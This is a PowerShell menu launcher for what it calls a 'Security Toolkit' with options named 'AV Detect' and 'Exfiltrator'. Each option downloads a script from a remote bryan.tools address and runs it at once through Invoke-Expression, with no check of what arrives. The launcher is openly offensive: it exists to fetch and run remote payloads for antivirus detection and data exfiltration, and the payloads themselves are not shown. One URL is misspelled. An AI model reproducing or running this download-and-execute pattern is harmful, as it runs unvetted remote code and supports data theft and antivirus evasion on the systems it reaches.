function Show-AsciiArt {
    $ascii = @"
    ╔════════════════════════════════════════════════╗
    ║  ██████╗ ██████╗ ██╗   ██╗ █████╗ ███╗   ██╗  ║
    ║  ██╔══██╗██╔══██╗╚██╗ ██╔╝██╔══██╗████╗  ██║  ║
    ║  ██████╔╝██████╔╝ ╚████╔╝ ███████║██╔██╗ ██║  ║
    ║  ██╔══██╗██╔══██╗  ╚██╔╝  ██╔══██║██║╚██╗██║  ║
    ║  ██████╔╝██║  ██║   ██║   ██║  ██║██║ ╚████║  ║
    ║  ╚═════╝ ╚═╝  ╚═╝   ╚═╝   ╚═╝  ╚═╝╚═╝  ╚═══╝  ║
    ║                                                 ║
    ║  ████████╗ ██████╗  ██████╗ ██╗     ███████╗  ║
    ║  ╚══██╔══╝██╔═══██╗██╔═══██╗██║     ██╔════╝  ║
    ║     ██║   ██║   ██║██║   ██║██║     ███████╗  ║
    ║     ██║   ██║   ██║██║   ██║██║     ╚════██║  ║
    ║     ██║   ╚██████╔╝╚██████╔╝███████╗███████║  ║
    ║     ╚═╝    ╚═════╝  ╚═════╝ ╚══════╝╚══════╝  ║
    ║                                                 ║
    ║          Security Toolkit v1.0                 ║
    ╚════════════════════════════════════════════════╝
"@
    $colors = @('Red', 'Yellow', 'Green', 'Cyan', 'Blue', 'Magenta')
    $lines = $ascii -split "`n"
    
    for ($i = 0; $i -lt $lines.Count; $i++) {
        $color = $colors[$i % $colors.Count]
        # Keep the last line (Security Toolkit) in white
        if ($i -eq $lines.Count - 2) {
            Write-Host $lines[$i] -ForegroundColor White
        } else {
            Write-Host $lines[$i] -ForegroundColor $color
        }
    }
}

function Show-LoadingAnimation {
    $loadingChars = '|', '/', '-', '\'
    foreach ($char in $loadingChars * 3) {
        Write-Host "`rInitializing [$char]" -NoNewline
        Start-Sleep -Milliseconds 100
    }
    Write-Host "`r                      " -NoNewline
}

function Show-Menu {
    param (
        [int]$SelectedIndex = 0
    )
    $options = @(
        "What is my IP?",
        "Am I admin?",
        "AV Detect",
        "Exfiltrator",
        "Reporter",
        "Exit"
    )

    Clear-Host
    Show-AsciiArt
    Write-Host "`nUse ↑/↓ arrows or numbers (1-6) to select, Enter to execute`n" -ForegroundColor Yellow

    for ($i = 0; $i -lt $options.Count; $i++) {
        if ($i -eq $SelectedIndex) {
            Write-Host "→ [$($i + 1)] $($options[$i])" -ForegroundColor Green
        } else {
            Write-Host "  [$($i + 1)] $($options[$i])" -ForegroundColor Gray
        }
    }
}

function Invoke-Tool {
    param (
        [string]$Url
    )
    Write-Host "`nExecuting script..." -ForegroundColor Yellow
    try {
        $result = Invoke-RestMethod -Uri $Url
        Invoke-Expression $result
    } catch {
        Write-Host "Error executing script: $_" -ForegroundColor Red
    }
    Write-Host "`nPress any key to continue..."
    $null = $Host.UI.RawUI.ReadKey('NoEcho,IncludeKeyDown')
}

# Main menu loop
$selectedIndex = 0
$urls = @(
    "bryan.tool/Whatismtip",
    "bryan.tools/amiadmin",
    "bryan.tools/detect",
    "bryan.tools/exfil",
    "bryan.tools/report"
)

Show-LoadingAnimation

while ($true) {
    Show-Menu -SelectedIndex $selectedIndex
    
    $key = $Host.UI.RawUI.ReadKey('NoEcho,IncludeKeyDown')
    
    # Handle number keys (1-6)
    if ($key.KeyChar -ge '1' -and $key.KeyChar -le '6') {
        $selectedIndex = [int]($key.KeyChar - '1')
        if ($selectedIndex -eq 5) {
            Clear-Host
            Write-Host "Goodbye!" -ForegroundColor Cyan
            return
        }
        Invoke-Tool -Url $urls[$selectedIndex]
        continue
    }
    
    switch ($key.VirtualKeyCode) {
        38 { # Up arrow
            if ($selectedIndex -gt 0) { $selectedIndex-- }
        }
        40 { # Down arrow
            if ($selectedIndex -lt 5) { $selectedIndex++ }
        }
        13 { # Enter
            if ($selectedIndex -eq 5) {
                Clear-Host
                Write-Host "Goodbye!" -ForegroundColor Cyan
                return
            }
            Invoke-Tool -Url $urls[$selectedIndex]
        }
    }
}
